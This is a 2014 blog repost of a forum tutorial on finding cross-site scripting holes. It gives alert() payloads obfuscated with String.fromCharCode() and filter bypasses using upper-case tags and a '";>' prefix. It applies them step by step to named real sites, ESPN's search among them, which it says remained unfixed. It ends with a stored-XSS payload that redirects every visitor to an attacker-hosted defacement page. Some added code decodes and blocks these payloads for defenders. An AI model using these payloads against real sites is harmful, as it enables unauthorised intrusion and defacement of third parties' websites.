Monday 12 May 2014

Find XSS Vuln's Like a Pro

What is XSS?

Cross-site scripting holes are web-application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern web browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access-privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

Read More at : http://en.wikipedia.org/wiki/Cross-site_scripting

Difference between Persistent and Non-Persistent XSS?

There are two types of XSS: persistent and non-persistent.

Non-Persistent: the payload is reflected straight back by the page you sent it to, so when you refresh the page without it, it is gone. It can also be exploited to get the admin cookie (I won't be covering that in this tutorial).

Persistent: the payload is stored on the server side, sticks to the page, and shows up for everyone who visits the site.

Where to find XSS?

XSS vulnerabilities can be found in search boxes and login pages; in fact, they can be found in any text box that exists on a site.
For sure, you won't find XSS vulns on the Google homepage unless you are lucky, and even then it would take hours to find one.

My First XSS Attack:

Before performing your first XSS attack, you need to know the basics.

You can't find XSS using Google Chrome, because it has an XSS filter, so download Firefox!

Download Mozilla here!

In order to find an XSS vuln, you need to start your code with:

Code:
<script> </script>

If you are an HTML coder, this will be easy as fuck for you.

Now we need to define what we want the page to display. In this tutorial I will be covering alert boxes.
There are onmouse (event handler) vulns too; I may add them to this tutorial later.

So our base code is:

Code:
<script>alert(Your Text Here)</script>

For sure, and I am sure as fuck, you won't find an XSS vuln on any website using this code.
Here comes the turn of the bypassing.

How to Bypass XSS Filters?

There are two ways to bypass XSS filters in search bars.
The most common one is using String.fromCharCode().
I will be covering that, and I may add other methods later.

String.fromCharCode() converts Unicode code values into characters, so the alert text never appears literally in the payload and a filter that looks for the plain text or for quote characters does not see it.

Bypassing Filters:

First of all, make sure you have Mozilla Firefox. You will need the HackBar add-on.
Here is the download link:

Press me to download the HackBar Mozilla add-on

Make sure you are on Mozilla while downloading it.

Now, when you have finished installing HackBar,
restart Mozilla Firefox.

You will notice that the bar is installed; it should look like this:

[Image: TT5eH.png]

So basically I will be showing you how to find XSS on websites.
I will be using http://www.search-results.com.
Whenever I type something stupid into the URL bar, I get redirected to it.

So I will be using it as my target.

Now let's start.

Go to the HackBar, open the XSS tab, press String.fromCharCode() and enter your text:

[Image: 2TWLL.png]

I entered TwinBlade-HF. When you are done, press OK.

Now, as I stated above, the base is our key to finding XSS vulns.

And our base was:

Code:
<script>alert(TwinBlade-HF)</script>

I guess it's obvious that the above code does not work?
Replace the text with our string function.

Here is our base:

Code:
<script>alert()</script>

So instead of the (text_here) we enter our String.fromCharCode() text.

So we can simply bypass the filter.
It will look like:

Code:
<script>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</script>

Notice we have made the String.fromCharCode() call the alert text, so at the beginning of String.fromCharCode() we put a bracket:

Code:
(

and there must be two closing brackets at the end of it (one for String.fromCharCode() and one for alert()).
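As an added example (not part of the original tutorial), here is how a defender reviewing request logs can undo the String.fromCharCode() obfuscation just described and flag the script tag whatever its letter case; the sample search terms and the function names are constructed for illustration.

```javascript
// Added defensive example, not code from the original tutorial.
// Reverses the String.fromCharCode() obfuscation so a log reviewer sees
// the text the alert() would have displayed, and flags script injection
// attempts case-insensitively (browsers treat <SCRIPT> and <script> alike).

// Replace every String.fromCharCode(...) call with the decoded string literal.
function decodeCharCodeCalls(input) {
  return input.replace(/String\.fromCharCode\(([\d\s,]*)\)/gi, (_, list) => {
    const codes = list.split(",").map(s => s.trim()).filter(Boolean).map(Number);
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// URL-decode a logged parameter value; keep the raw value if it is malformed.
function safeDecode(value) {
  try { return decodeURIComponent(value); } catch (e) { return value; }
}

// Detection: a script tag in any letter case, or a fromCharCode() call,
// inside a decoded parameter value is worth flagging for review.
function looksLikeScriptInjection(value) {
  const decoded = safeDecode(value);
  return /<\s*script\b/i.test(decoded) || /fromCharCode\s*\(/i.test(decoded);
}

// Constructed sample search terms as they might appear in an access log:
// a benign term, the tutorial's payload, and a URL-encoded attribute break-out.
const SAMPLE_TERMS = [
  "test",
  "<SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>",
  "%22%3B%3E%3CSCRIPT%3Ealert(String.fromCharCode(72,105))%3C/SCRIPT%3E",
];

// Return the flagged terms, decoded, ready for an analyst to read.
function reviewTerms(terms) {
  return terms.filter(looksLikeScriptInjection).map(t => decodeCharCodeCalls(safeDecode(t)));
}

console.log(reviewTerms(SAMPLE_TERMS));
```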

Now, let's find some vulns on our target:

Code:
www.search-results.com

Copy the above code and head towards:

http://www.search-results.com/

And insert it on the main page.

And the result is:

[Image: ELeJI.png]

Yeah, you just got trolled by the website.
Here comes the part on how to find XSS vulns like a pro.

How to Find XSS Vulnerabilities like a Pro.

So basically, whenever I type something into my URL bar that isn't a website link,

it redirects me to: http://www.search-results.com/

I am sure you know what I mean.

Go go go! Enter your String.fromCharCode() code into the URL bar directly.

And here is our result!:

[Image: HrdsQ.png]

Losing hope, huh? Omg

Don't! Caps Lock button!

Here is my point:

Code:
<script>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</script>

Goes to:

Code:
<SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

Try it, and you will simply fail! Hehe

Try adding some characters and symbols at the beginning:

Code:
<SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

Goes to:

Code:
";><SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

and try entering it in the URL bar; as I said, it will redirect you to search-results.

But I am sure you will notice the change:

[Image: Rixea.png]

But if you try entering it directly on the search homepage, it won't work:

[Image: 8BPsT.png]
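The two bypasses above (Caps Lock on the tag name, and the ";> prefix that closes a quoted attribute before the tag) work against blacklist-style filters. As an added example, not code from the original post, this constructed template shows a naive case-sensitive filter letting both variants through while contextual HTML encoding renders all three payload forms inert; naiveFilter, htmlEncode, renderSearchPage and scriptSurvives are illustrative names of my own.

```javascript
// Added defensive example, not code from the original post. The filter and
// the page template are constructed to illustrate why blacklists fail.

// A naive blacklist: strips the literal lowercase <script> tag only.
// This is exactly the kind of filter the Caps Lock trick walks past.
function naiveFilter(input) {
  return input.split("<script>").join("").split("</script>").join("");
}

// Contextual output encoding: every character with meaning in HTML text
// or inside a double-quoted attribute becomes an entity.
function htmlEncode(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Constructed search page: the term is echoed inside value="" and as text,
// the two places the tutorial's payloads land.
function renderSearchPage(term, sanitize) {
  const safe = sanitize(term);
  return `<input type="text" value="${safe}">\n<p>Results for ${safe}</p>`;
}

// A script tag in any letter case in the output means the browser will run it.
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// The three payload forms the tutorial progresses through.
const PAYLOADS = [
  '<script>alert(String.fromCharCode(84, 119))</script>',
  '<SCRIPT>alert(String.fromCharCode(84, 119))</SCRIPT>',
  '";><SCRIPT>alert(String.fromCharCode(84, 119))</SCRIPT>',
];

// One boolean per payload: does a live script survive into the page?
function scriptSurvives(sanitize) {
  return PAYLOADS.map(p => containsLiveScript(renderSearchPage(p, sanitize)));
}

console.log("naive filter  :", scriptSurvives(naiveFilter)); // [ false, true, true ]
console.log("HTML encoding :", scriptSurvives(htmlEncode));  // [ false, false, false ]
```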

Now, this was one of the techniques. Here is another one:

You can't only find XSS vulns in search bars.
As I told you before, it could be any text box that the site includes.
For this example I will use http://search.espn.go.com/

Don't worry, I have reported it. But lazy bastards are lazy. Mad
They did not even reply or fix it, so I will be using it in this tutorial.

Go to:

http://search.espn.go.com/

Type anything in the search bar, something like test.

If you try putting our XSS statement in directly, it will give you an error.

So here comes the trick.

Here is our weapon:

Code:
";><SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

And here is our target:

[Image: SElqf.png]

Try entering our weapon in the search:

[Image: MeDJW.png]

Yeah, you got trolled.

But in case you have not noticed, there is another text box here:

[Image: AFaRo.png]

Why don't you go enter our weapon there and then press Enter?:

[Image: wY2GC.png]

Woot! XSS on ESPN.

Now I will be mentioning another one.

I will be using http://tumblrstation.com/ as a target.

Now, I can't see any search text boxes.

And for sure, the login page is not only for users to log in :P

Here, as there are no search boxes, go to the login page:

http://tumblrstation.com/user/login

and inject it with our code:

Code:
";><SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

[Image: 76tNP.png]

WOOT! That was simple, right?

Now, I may add more techniques/methods/ways later on.

Defacing a website?

For defacing a website using XSS, before giving you the code,
let me tell you something: you can't deface a website using a non-persistent XSS; you can only deface it using a persistent XSS vulnerability.

Persistent ones are rare to find; you will be lucky if you find one.

As I said before, persistent XSS vulns show up for everyone:

Code:
<script>window.location="http://www.PasteHtml.com/DefaceCodeHere/";</script>

The code pretty much explains itself. Now, you need a deface page to deface a website, that's logic. Hehe

Host your deface page at http://www.pastehtml.com

To make one, you need to know HTML coding.

Good luck.. :D

Source: http://www.hackforums.net/showthread.php?tid=2539599&highlight=XSS+Tutorial

© Geek Tricks by Aletheia | Designed By